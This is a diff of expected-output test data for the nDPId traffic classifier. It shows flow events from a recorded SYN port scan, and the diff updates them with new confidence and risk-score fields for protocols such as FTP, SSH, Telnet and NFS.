 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -5336,7 +5336,7 @@
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060355,"flow_last_seen":1278275060355,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8192,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8192,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00608{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1825,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2049,"l4_proto":"tcp","ndpi": {"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}}
+00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1825,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2049,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1825,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":944,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00569{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":944,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -5354,7 +5354,7 @@
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060456,"flow_last_seen":1278275060456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":802,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49154,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":802,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49154,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00608{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1906,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2049,"l4_proto":"tcp","ndpi": {"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}}
+00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1906,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2049,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1906,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8194,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -5520,23 +5520,23 @@
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2068,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00607{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20,"l4_proto":"tcp","ndpi": {"proto":"FTP_DATA","breed":"Acceptable","category":"Download"}}
+00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"FTP_DATA","breed":"Acceptable","category":"Download"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2068,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00607{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060597,"flow_last_seen":1278275060597,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20,"l4_proto":"tcp","ndpi": {"proto":"FTP_DATA","breed":"Acceptable","category":"Download"}}
+00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060597,"flow_last_seen":1278275060597,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"FTP_DATA","breed":"Acceptable","category":"Download"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060597,"flow_last_seen":1278275060597,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00691{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056340,"flow_last_seen":1278275056340,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
+00808{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056340,"flow_last_seen":1278275056340,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
 00569{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056340,"flow_last_seen":1278275056340,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00693{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1278275057678,"flow_last_seen":1278275079360,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":22,"l4_proto":"tcp","ndpi": {"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"","server_signature":"","hassh_client":"","hassh_server":""}}
+00729{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1278275057678,"flow_last_seen":1278275079360,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":22,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"","server_signature":"","hassh_client":"","hassh_server":""}}
 00569{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1278275057678,"flow_last_seen":1278275079360,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":22,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00691{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
+00808{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
 00569{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00589{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49175,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00681{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056466,"flow_last_seen":1278275056466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"","password":""}}
+00798{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056466,"flow_last_seen":1278275056466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"","password":""}}
 00569{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056466,"flow_last_seen":1278275056466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":23,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00589{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060743,"flow_last_seen":1278275060743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49175,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
